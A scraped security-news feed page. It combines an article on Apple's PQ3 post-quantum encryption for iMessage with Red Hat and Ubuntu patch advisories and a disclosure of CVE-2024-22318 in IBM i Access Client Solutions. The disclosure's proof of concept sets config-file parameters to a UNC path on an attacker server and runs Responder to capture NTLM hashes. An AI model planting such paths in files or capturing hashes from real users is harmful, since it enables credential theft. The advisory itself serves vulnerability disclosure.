Useful quantum computers aren’t a reality—yet. But in one of the biggest deployments of post-quantum encryption so far, Apple is bringing the technology to iMessage.

Apple is launching its first post-quantum protections, one of the biggest deployments of the future-resistant encryption technology to date.

Billions of medical records, financial transactions, and messages we send to each other are protected by encryption. It’s fundamental to keeping modern life and the global economy running relatively smoothly. However, the decades-long race to create vastly powerful quantum computers, which could easily crack current encryption, creates new risks.

While practical quantum computing technology may still be years or decades away, security officials, tech companies, and governments are ramping up their efforts to start using a new generation of post-quantum cryptography. These new encryption algorithms will, in short, protect our current systems against any potential quantum computing-based attacks.

Today Cupertino is announcing that PQ3—its post-quantum cryptographic protocol—will be included in iMessage. The update will launch in iOS and iPad OS 17.4 and macOS 14.4 after previously being deployed in the beta versions of the software. Apple, which published the news on its security research blog, says the change is the “most significant cryptographic security upgrade in iMessage history.”

“We rebuilt the iMessage cryptographic protocol from the ground up,” its blog post says, adding that the upgrade will fully replace its existing encryption protocols by the end of this year. You don’t need to do anything other than update your operating system for the new protections to be applied.

Quantum computing is serious business. Governments in the US, China, and Russia as well as tech companies such as Google, Amazon, and IBM are plowing billions into the (still) relatively nascent efforts to create quantum computers. If successful, the technologies could help unlock scientific breakthroughs in everything from drug design to creating longer-lasting batteries. Politicians are also vying to become quantum superpowers. The current quantum computing devices are still experimental and not practical for general use.

Unlike the computers we use today, quantum computers use qubits, which can exist in more than one state. (Current bits are either ones or zeroes). It means that quantum devices can store more information than traditional computers and perform more complex calculations, including potentially cracking encryption.

“Quantum computers, if deployed reliably and in a scalable manner, would have the potential to break most of today’s cryptography,” says Lukasz Olejnik, an independent cybersecurity and privacy researcher and consultant. This includes the encryption in the messaging apps that billions of people use every day. Most encrypted messaging apps using public key cryptography have used RSA, Elliptic Curve, or Diffie-Hellman algorithms.

Responding to the potential threat—which has been known about since the 1990s—intelligence and security agencies have become increasingly vocal about developing and deploying quantum-resistant cryptography. The National Institute of Standards and Technology in the US has been a driving force behind the creation of these new encryption types. Olejnik says tech companies are taking the quantum threat “very” seriously. “Much more serious than some older changes like switches between hash functions,” Olejnik says, adding that things are moving relatively fast given that post-quantum cryptography is still “very young” and there’s “no functional quantum computer on the horizon.”

Apple’s rollout of PQ3 in iMessage follows Signal in introducing post-quantum algorithms—the encrypted messaging app introduced its PQXDH specification in September, saying it is built on the Kyber algorithm. Proton, the creator of encrypted email and other apps, said around the same time that it is building quantum-safe PGP encryption for everyone to use.

In its blog post, Apple details how PQ3 has been built and how it operates. The company says PQ3 creates a new post-quantum encryption key as part of the public keys that phones and computers using iMessage create and transmit to Apple’s servers. The company is using the Kyber algorithm—the same approach as Signal—to do this and will generate the keys from the first message that is sent, even if the person receiving the message is offline.

Apple says its setup will apply its post-quantum protections to the creation of encryption keys and the exchange of messages, including if someone’s encryption key has been compromised by an attacker. “To best protect end-to-end encrypted messaging, the post-quantum keys need to change on an ongoing basis to place an upper bound on how much of a conversation can be exposed by any single, point-in-time key compromise—both now and with future quantum computers,” the company says in its blog post.

The post-quantum protections are an addition to its existing encryption, Apple says. It is using a “hybrid design” that combines its current elliptic curve cryptography (ECC) with the newer post-quantum protections. “Defeating PQ3 security requires defeating both the existing, classical ECC cryptography and the new post-quantum primitives,” Apple writes.

Apple says PQ3 has been externally assessed by a third-party security company, which it has not named, and also two groups of academics who have written papers analyzing the system. The company argues that its approach—as it is able to issue new quantum keys—has stronger protections than Signal’s current deployment. “We conclude that this protocol achieves strong security guarantees against an active network adversary who can selectively compromise parties and has quantum computing capabilities,” a research paper led by David Basin, a computer science professor at ETH Zurich, says of PQ3.

While there’s no guarantee that quantum technologies will ever develop enough to become useful, it’s likely that the next few years will see a steady drip of companies deploying and enhancing their post-quantum protocols. In part, this is to combat one of the biggest current fears around quantum computing: that countries and threat actors are gathering and hoarding encrypted data today with the plan to unlock its secrets if quantum technologies evolve.

Starting to deploy post-quantum encryption now—before functional quantum computers exist—has the potential to limit the impact of these so-called “harvest now, decrypt later” attacks. “We are seeing our adversaries do this—copying down our encrypted data and just holding on to it,” Dustin Moody, who leads post-quantum encryption standards in the US told _The New Yorker_ in 2022. “It’s definitely a real threat.”

Apple iOS 17.4: iMessage Gets Post-Quantum Encryption in New Update

Red Hat Security Advisory 2024-0879-03 - An update for java-1.8.0-ibm is now available for Red Hat Enterprise Linux 7 Supplementary. Issues addressed include denial of service and deserialization vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0879.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: java-1.8.0-ibm security update  
Advisory ID:        RHSA-2024:0879-03  
Product:            Red Hat Enterprise Linux Supplementary  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0879  
Issue date:         2024-02-20  
Revision:           03  
CVE Names:          CVE-2023-5676  
====================================================================

Summary: 

An update for java-1.8.0-ibm is now available for Red Hat Enterprise Linux 7 Supplementary.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

IBM Java SE version 8 includes the IBM Java Runtime Environment and the IBM Java Software Development Kit.

This update upgrades IBM Java SE 8 to version 8 SR8-FP15.

Security Fix(es):

* IBM JDK: Eclipse OpenJ9 JVM denial of service (CVE-2023-5676)

* OpenJDK: IOR deserialization issue in CORBA (8303384) (CVE-2023-22067)

* OpenJDK: certificate path validation issue during client authentication (8309966) (CVE-2023-22081)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-5676

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2243627  
https://bugzilla.redhat.com/show_bug.cgi?id=2243637  
https://bugzilla.redhat.com/show_bug.cgi?id=2250255

Red Hat Security Advisory 2024-0879-03

Red Hat Security Advisory 2024-0866-03 - An update for java-1.8.0-ibm is now available for Red Hat Enterprise Linux 8. Issues addressed include denial of service and deserialization vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0866.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: java-1.8.0-ibm security update  
Advisory ID:        RHSA-2024:0866-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0866  
Issue date:         2024-02-19  
Revision:           03  
CVE Names:          CVE-2023-5676  
====================================================================

Summary: 

An update for java-1.8.0-ibm is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

IBM Java SE version 8 includes the IBM Java Runtime Environment and the IBM Java Software Development Kit.

This update upgrades IBM Java SE 8 to version 8 SR8-FP15.

Security Fix(es):

* IBM JDK: Eclipse OpenJ9 JVM denial of service (CVE-2023-5676)

* OpenJDK: IOR deserialization issue in CORBA (8303384) (CVE-2023-22067)

* OpenJDK: certificate path validation issue during client authentication (8309966) (CVE-2023-22081)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-5676

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2243627  
https://bugzilla.redhat.com/show_bug.cgi?id=2243637  
https://bugzilla.redhat.com/show_bug.cgi?id=2250255

Red Hat Security Advisory 2024-0866-03

Red Hat Security Advisory 2024-0768-03 - An update for libmaxminddb is now available for Red Hat Enterprise Linux 8.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0768.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: libmaxminddb security updateAdvisory ID:        RHSA-2024:0768-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0768Issue date:         2024-02-12Revision:           03CVE Names:          CVE-2020-28241====================================================================Summary: An update for libmaxminddb is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The libmaxminddb package contains the MaxMind DB library.Security Fix(es):* libmaxminddb: improper initialization in dump_entry_data_list() in maxminddb.c (CVE-2020-28241)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2020-28241References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=1895379

Red Hat Security Advisory 2024-0768-03

IBM i Access Client Solutions (ACS) versions 1.1.2 through 1.1.4 and 1.1.4.3 through 1.1.9.4 suffer from a remote credential theft vulnerability.

[+] Credits: John Page (aka hyp3rlinx)      
[+] Website: hyp3rlinx.altervista.org  
[+] Source:  http://hyp3rlinx.altervista.org/advisories/IBMI_ACCESS_CLIENT_REMOTE_CREDENTIAL_THEFT_CVE-2024-22318.txt  
[+] twitter.com/hyp3rlinx  
[+] ISR: ApparitionSec     

[Vendor]  
www.ibm.com

[Product]  
IBM i Access Client Solutions

[Versions]  
All

[Remediation/Fixes]  
None

[Vulnerability Type]  
Remote Credential Theft

[CVE Reference]  
CVE-2024-22318

[Security Issue]  
IBM i Access Client Solutions (ACS) is vulnerable to remote credential theft when NT LAN Manager (NTLM) is enabled on Windows workstations.  
Attackers can create UNC capable paths within ACS 5250 display terminal configuration ".HOD" or ".WS" files to point to a hostile server.  
If NTLM is enabled and the user opens an attacker supplied file the Windows operating system will try to authenticate using the current user's session.  
The attacker controlled server could then capture the NTLM hash information to obtain the user's credentials.

[References]  
https://www.ibm.com/support/pages/node/7116091

[Exploit/POC]  
The client access .HOD File vulnerable parameters:

1) screenHistoryArchiveLocation=\\ATTACKER-SERVER\RemoteCredTheftP0c

[KeyRemapFile]  
2) Filename= \\ATTACKER-SERVER\RemoteCredTheftP0c

Next, Kali Linux Responder.py to capture: Responder.py -I eth0 -A -vv

The client access legacy .WS File vulnerable parameters:  
DefaultKeyboard= \\ATTACKER-SERVER\RemoteCredTheftP0c

Example, client access older .WS file

[Profile]  
ID=WS  
Version=9  
[Telnet5250]  
AssociatedPrinterStartMinimized=N  
AssociatedPrinterTimeout=0  
SSLClientAuthentication=Y  
HostName=PWN  
AssociatedPrinterClose=N  
Security=CA400  
CertSelection=AUTOSELECT  
AutoReconnect=Y  
[KeepAlive]  
KeepAliveTimeOut=0  
[Keyboard]  
IBMDefaultKeyboard=N  
DefaultKeyboard=\\ATTACKER-SERVER\RemoteCredTheftP0c  
[Communication]  
Link=telnet5250

[Network Access]  
Remote

[Severity]  
Medium

[Disclosure Timeline]  
Vendor Notification:  December 14, 2023  
Vendor Addresses Issue: February 7, 2024  
February 8, 2024 : Public Disclosure

[+] Disclaimer  
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.  
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and  
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit  
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility  
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information  
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

IBM i Access Client Solutions Remote Credential Theft

Red Hat Security Advisory 2024-0751-03 - An update for libmaxminddb is now available for Red Hat Enterprise Linux 8.6 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0751.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: libmaxminddb security updateAdvisory ID:        RHSA-2024:0751-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0751Issue date:         2024-02-09Revision:           03CVE Names:          CVE-2020-28241====================================================================Summary: An update for libmaxminddb is now available for Red Hat Enterprise Linux 8.6 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The libmaxminddb package contains the MaxMind DB library.Security Fix(es):* libmaxminddb: improper initialization in dump_entry_data_list() in maxminddb.c (CVE-2020-28241)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2020-28241References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=1895379

Red Hat Security Advisory 2024-0751-03

Red Hat Security Advisory 2024-0750-03 - An update for libmaxminddb is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0750.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: libmaxminddb security updateAdvisory ID:        RHSA-2024:0750-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0750Issue date:         2024-02-09Revision:           03CVE Names:          CVE-2020-28241====================================================================Summary: An update for libmaxminddb is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The libmaxminddb package contains the MaxMind DB library.Security Fix(es):* libmaxminddb: improper initialization in dump_entry_data_list() in maxminddb.c (CVE-2020-28241)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2020-28241References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=1895379

Red Hat Security Advisory 2024-0750-03

Ubuntu Security Notice 6626-1 - Quentin Minster discovered that a race condition existed in the KSMBD implementation in the Linux kernel when handling sessions operations. A remote attacker could use this to cause a denial of service or possibly execute arbitrary code. Marek Marczykowski-Górecki discovered that the Xen event channel infrastructure implementation in the Linux kernel contained a race condition. An attacker in a guest VM could possibly use this to cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-6626-1February 08, 2024linux, linux-aws, linux-aws-5.15, linux-gcp, linux-gcp-5.15, linux-gke,linux-gkeop, linux-gkeop-5.15, linux-hwe-5.15, linux-ibm, linux-ibm-5.15,linux-kvm, linux-lowlatency-hwe-5.15, linux-nvidia, linux-oracle,linux-oracle-5.15 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-gke: Linux kernel for Google Container Engine (GKE) systems- linux-gkeop: Linux kernel for Google Container Engine (GKE) systems- linux-ibm: Linux kernel for IBM cloud systems- linux-kvm: Linux kernel for cloud environments- linux-nvidia: Linux kernel for NVIDIA systems- linux-oracle: Linux kernel for Oracle Cloud systems- linux-aws-5.15: Linux kernel for Amazon Web Services (AWS) systems- linux-gcp-5.15: Linux kernel for Google Cloud Platform (GCP) systems- linux-gkeop-5.15: Linux kernel for Google Container Engine (GKE) systems- linux-hwe-5.15: Linux hardware enablement (HWE) kernel- linux-ibm-5.15: Linux kernel for IBM cloud systems- linux-lowlatency-hwe-5.15: Linux low latency kernel- linux-oracle-5.15: Linux kernel for Oracle Cloud systemsDetails:Quentin Minster discovered that a race condition existed in the KSMBDimplementation in the Linux kernel when handling sessions operations. Aremote attacker could use this to cause a denial of service (system crash)or possibly execute arbitrary code. (CVE-2023-32250, CVE-2023-32252,CVE-2023-32257)Marek Marczykowski-Górecki discovered that the Xen event channelinfrastructure implementation in the Linux kernel contained a racecondition. An attacker in a guest VM could possibly use this to cause adenial of service (paravirtualized device unavailability). (CVE-2023-34324)Zheng Wang discovered a use-after-free in the Renesas Ethernet AVB driverin the Linux kernel during device removal. A privileged attacker could usethis to cause a denial of service (system crash). (CVE-2023-35827)Tom Dohrmann discovered that the Secure Encrypted Virtualization (SEV)implementation for AMD processors in the Linux kernel contained a racecondition when accessing MMIO registers. A local attacker in a SEV guest VMcould possibly use this to cause a denial of service (system crash) orpossibly execute arbitrary code. (CVE-2023-46813)It was discovered that the Microchip USB Ethernet driver in the Linuxkernel contained a race condition during device removal, leading to a use-after-free vulnerability. A physically proximate attacker could use this tocause a denial of service (system crash). (CVE-2023-6039)It was discovered that the TLS subsystem in the Linux kernel did notproperly perform cryptographic operations in some situations, leading to anull pointer dereference vulnerability. A local attacker could use this tocause a denial of service (system crash) or possibly execute arbitrarycode. (CVE-2023-6176)Xingyuan Mo discovered that the netfilter subsystem in the Linux kernel didnot properly handle dynset expressions passed from userspace, leading to anull pointer dereference vulnerability. A local attacker could use this tocause a denial of service (system crash). (CVE-2023-6622)It was discovered that the TIPC protocol implementation in the Linux kerneldid not properly handle locking during tipc_crypto_key_revoke() operations.A local attacker could use this to cause a denial of service (kerneldeadlock). (CVE-2024-0641)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:   linux-image-5.15.0-1036-gkeop   5.15.0-1036.42   linux-image-5.15.0-1044-nvidia  5.15.0-1044.44   linux-image-5.15.0-1044-nvidia-lowlatency  5.15.0-1044.44   linux-image-5.15.0-1046-ibm     5.15.0-1046.49   linux-image-5.15.0-1050-gke     5.15.0-1050.55   linux-image-5.15.0-1050-kvm     5.15.0-1050.55   linux-image-5.15.0-1051-gcp     5.15.0-1051.59   linux-image-5.15.0-1051-oracle  5.15.0-1051.57   linux-image-5.15.0-1053-aws     5.15.0-1053.58   linux-image-5.15.0-94-generic   5.15.0-94.104   linux-image-5.15.0-94-generic-64k  5.15.0-94.104   linux-image-5.15.0-94-generic-lpae  5.15.0-94.104   linux-image-aws-lts-22.04       5.15.0.1053.52   linux-image-gcp-lts-22.04       5.15.0.1051.47   linux-image-generic             5.15.0.94.91   linux-image-generic-64k         5.15.0.94.91   linux-image-generic-lpae        5.15.0.94.91   linux-image-gke                 5.15.0.1050.49   linux-image-gke-5.15            5.15.0.1050.49   linux-image-gkeop               5.15.0.1036.35   linux-image-gkeop-5.15          5.15.0.1036.35   linux-image-ibm                 5.15.0.1046.42   linux-image-kvm                 5.15.0.1050.46   linux-image-nvidia              5.15.0.1044.44   linux-image-nvidia-lowlatency   5.15.0.1044.44   linux-image-oracle              5.15.0.1051.46   linux-image-oracle-lts-22.04    5.15.0.1051.46   linux-image-virtual             5.15.0.94.91Ubuntu 20.04 LTS:   linux-image-5.15.0-1036-gkeop   5.15.0-1036.42~20.04.1   linux-image-5.15.0-1046-ibm     5.15.0-1046.49~20.04.1   linux-image-5.15.0-1051-gcp     5.15.0-1051.59~20.04.1   linux-image-5.15.0-1051-oracle  5.15.0-1051.57~20.04.1   linux-image-5.15.0-1053-aws     5.15.0-1053.58~20.04.1   linux-image-5.15.0-94-generic   5.15.0-94.104~20.04.1   linux-image-5.15.0-94-generic-64k  5.15.0-94.104~20.04.1   linux-image-5.15.0-94-generic-lpae  5.15.0-94.104~20.04.1   linux-image-5.15.0-94-lowlatency  5.15.0-94.104~20.04.1   linux-image-5.15.0-94-lowlatency-64k  5.15.0-94.104~20.04.1   linux-image-aws                 5.15.0.1053.58~20.04.41   linux-image-gcp                 5.15.0.1051.59~20.04.1   linux-image-generic-64k-hwe-20.04  5.15.0.94.104~20.04.50   linux-image-generic-hwe-20.04   5.15.0.94.104~20.04.50   linux-image-generic-lpae-hwe-20.04  5.15.0.94.104~20.04.50   linux-image-gkeop-5.15          5.15.0.1036.42~20.04.32   linux-image-ibm                 5.15.0.1046.49~20.04.18   linux-image-lowlatency-64k-hwe-20.04  5.15.0.94.104~20.04.47   linux-image-lowlatency-hwe-20.04  5.15.0.94.104~20.04.47   linux-image-oem-20.04           5.15.0.94.104~20.04.50   linux-image-oem-20.04b          5.15.0.94.104~20.04.50   linux-image-oem-20.04c          5.15.0.94.104~20.04.50   linux-image-oem-20.04d          5.15.0.94.104~20.04.50   linux-image-oracle              5.15.0.1051.57~20.04.1   linux-image-virtual-hwe-20.04   5.15.0.94.104~20.04.50After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6626-1   CVE-2023-32250, CVE-2023-32252, CVE-2023-32257, CVE-2023-34324,   CVE-2023-35827, CVE-2023-46813, CVE-2023-6039, CVE-2023-6176,   CVE-2023-6622, CVE-2024-0641Package Information:   https://launchpad.net/ubuntu/+source/linux/5.15.0-94.104   https://launchpad.net/ubuntu/+source/linux-aws/5.15.0-1053.58   https://launchpad.net/ubuntu/+source/linux-gcp/5.15.0-1051.59   https://launchpad.net/ubuntu/+source/linux-gke/5.15.0-1050.55   https://launchpad.net/ubuntu/+source/linux-gkeop/5.15.0-1036.42   https://launchpad.net/ubuntu/+source/linux-ibm/5.15.0-1046.49   https://launchpad.net/ubuntu/+source/linux-kvm/5.15.0-1050.55   https://launchpad.net/ubuntu/+source/linux-nvidia/5.15.0-1044.44   https://launchpad.net/ubuntu/+source/linux-oracle/5.15.0-1051.57   https://launchpad.net/ubuntu/+source/linux-aws-5.15/5.15.0-1053.58~20.04.1   https://launchpad.net/ubuntu/+source/linux-gcp-5.15/5.15.0-1051.59~20.04.1   https://launchpad.net/ubuntu/+source/linux-gkeop-5.15/5.15.0-1036.42~20.04.1   https://launchpad.net/ubuntu/+source/linux-hwe-5.15/5.15.0-94.104~20.04.1   https://launchpad.net/ubuntu/+source/linux-ibm-5.15/5.15.0-1046.49~20.04.1 https://launchpad.net/ubuntu/+source/linux-lowlatency-hwe-5.15/5.15.0-94.104~20.04.1 https://launchpad.net/ubuntu/+source/linux-oracle-5.15/5.15.0-1051.57~20.04.1

Ubuntu Security Notice USN-6626-1

It was discovered that the SMB network file sharing protocol implementation in the Linux kernel did not properly handle certain error conditions, leading to a use-after-free vulnerability. Lin Ma discovered that the netfilter subsystem in the Linux kernel did not properly validate network family support while creating a new netfilter table. Various other issues were discovered and addressed.

Linux kernel vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

-   Ubuntu 20.04 LTS  
-   Ubuntu 18.04 LTS  
-   Ubuntu 16.04 ESM  
-   Ubuntu 22.04 LTS  
-   Ubuntu 14.04 ESM

Summary

Several security issues were fixed in the kernel.

Software Description

-   linux - Linux kernel  
-   linux-aws - Linux kernel for Amazon Web Services (AWS) systems  
-   linux-azure - Linux kernel for Microsoft Azure Cloud systems  
-   linux-gcp - Linux kernel for Google Cloud Platform (GCP) systems  
-   linux-gke - Linux kernel for Google Container Engine (GKE) systems  
-   linux-gkeop - Linux kernel for Google Container Engine (GKE) systems  
-   linux-ibm - Linux kernel for IBM cloud systems

Details

It was discovered that the SMB network file sharing protocol  
implementation in the Linux kernel did not properly handle certain error  
conditions, leading to a use-after-free vulnerability. A local attacker  
could use this to cause a denial of service (system crash) or possibly  
execute arbitrary code. (CVE-2023-5345)

Lin Ma discovered that the netfilter subsystem in the Linux kernel did  
not properly validate network family support while creating a new  
netfilter table. A local attacker could use this to cause a denial of  
service or possibly execute arbitrary code. (CVE-2023-6040)

It was discovered that the TLS subsystem in the Linux kernel did not  
properly perform cryptographic operations in some situations, leading to  
a null pointer dereference vulnerability. A local attacker could use  
this to cause a denial of service (system crash) or possibly execute  
arbitrary code. (CVE-2023-6176)

Xingyuan Mo discovered that the netfilter subsystem in the Linux kernel  
did not properly handle inactive elements in its PIPAPO data structure,  
leading to a use-after-free vulnerability. A local attacker could use  
this to cause a denial of service (system crash) or possibly execute  
arbitrary code. (CVE-2023-6817)

It was discovered that the IGMP protocol implementation in the Linux  
kernel contained a race condition, leading to a use-after-free  
vulnerability. A local attacker could use this to cause a denial of  
service (system crash) or possibly execute arbitrary code.  
(CVE-2023-6932)

Update instructions

The problem can be corrected by updating your kernel livepatch to the  
following versions:

Ubuntu 20.04 LTS  
    aws - 100.1  
    azure - 100.1  
    gcp - 100.1  
    generic - 100.1  
    gke - 100.1  
    gkeop - 100.1  
    ibm - 100.1  
    lowlatency - 100.1

Ubuntu 18.04 LTS  
    aws - 100.1  
    azure - 100.1  
    gcp - 100.1  
    generic - 100.1  
    lowlatency - 100.1

Ubuntu 16.04 ESM  
    aws - 100.1  
    azure - 100.1  
    gcp - 100.1  
    generic - 100.1  
    lowlatency - 100.1

Ubuntu 22.04 LTS  
    aws - 100.1  
    azure - 100.1  
    gcp - 100.1  
    generic - 100.1  
    gke - 100.1  
    ibm - 100.1

Ubuntu 14.04 ESM  
    generic - 100.1  
    lowlatency - 100.1

Support Information

Livepatches for supported LTS kernels will receive upgrades for a period  
of up to 13 months after the build date of the kernel.

Livepatches for supported HWE kernels which are not based on an LTS  
kernel version will receive upgrades for a period of up to 9 months  
after the build date of the kernel, or until the end of support for that  
kernel’s non-LTS distro release version, whichever is sooner.

References

-   CVE-2023-5345  
-   CVE-2023-6040  
-   CVE-2023-6176  
-   CVE-2023-6817  
-   CVE-2023-6932

Kernel Live Patch Security Notice LSN-0100-1

Ubuntu Security Notice 6625-1 - Marek Marczykowski-Górecki discovered that the Xen event channel infrastructure implementation in the Linux kernel contained a race condition. An attacker in a guest VM could possibly use this to cause a denial of service. Zheng Wang discovered a use-after-free in the Renesas Ethernet AVB driver in the Linux kernel during device removal. A privileged attacker could use this to cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-6625-1February 07, 2024linux, linux-aws, linux-aws-5.4, linux-azure, linux-azure-5.4,linux-bluefield, linux-gkeop, linux-hwe-5.4, linux-ibm, linux-ibm-5.4,linux-iot, linux-kvm, linux-oracle, linux-oracle-5.4, linux-xilinx-zynqmpvulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTS- Ubuntu 18.04 LTS (Available with Ubuntu Pro)Summary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-azure: Linux kernel for Microsoft Azure Cloud systems- linux-bluefield: Linux kernel for NVIDIA BlueField platforms- linux-gkeop: Linux kernel for Google Container Engine (GKE) systems- linux-ibm: Linux kernel for IBM cloud systems- linux-iot: Linux kernel for IoT platforms- linux-kvm: Linux kernel for cloud environments- linux-oracle: Linux kernel for Oracle Cloud systems- linux-xilinx-zynqmp: Linux kernel for Xilinx ZynqMP processors- linux-aws-5.4: Linux kernel for Amazon Web Services (AWS) systems- linux-azure-5.4: Linux kernel for Microsoft Azure cloud systems- linux-hwe-5.4: Linux hardware enablement (HWE) kernel- linux-ibm-5.4: Linux kernel for IBM cloud systems- linux-oracle-5.4: Linux kernel for Oracle Cloud systemsDetails:Marek Marczykowski-Górecki discovered that the Xen event channelinfrastructure implementation in the Linux kernel contained a racecondition. An attacker in a guest VM could possibly use this to cause adenial of service (paravirtualized device unavailability). (CVE-2023-34324)Zheng Wang discovered a use-after-free in the Renesas Ethernet AVB driverin the Linux kernel during device removal. A privileged attacker could usethis to cause a denial of service (system crash). (CVE-2023-35827)It was discovered that a race condition existed in the Linux kernel whenperforming operations with kernel objects, leading to an out-of-boundswrite. A local attacker could use this to cause a denial of service (systemcrash) or execute arbitrary code. (CVE-2023-45863)黄思聪 discovered that the NFC Controller Interface (NCI) implementation inthe Linux kernel did not properly handle certain memory allocation failureconditions, leading to a null pointer dereference vulnerability. A localattacker could use this to cause a denial of service (system crash).(CVE-2023-46343)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:   linux-image-5.4.0-1030-iot      5.4.0-1030.31   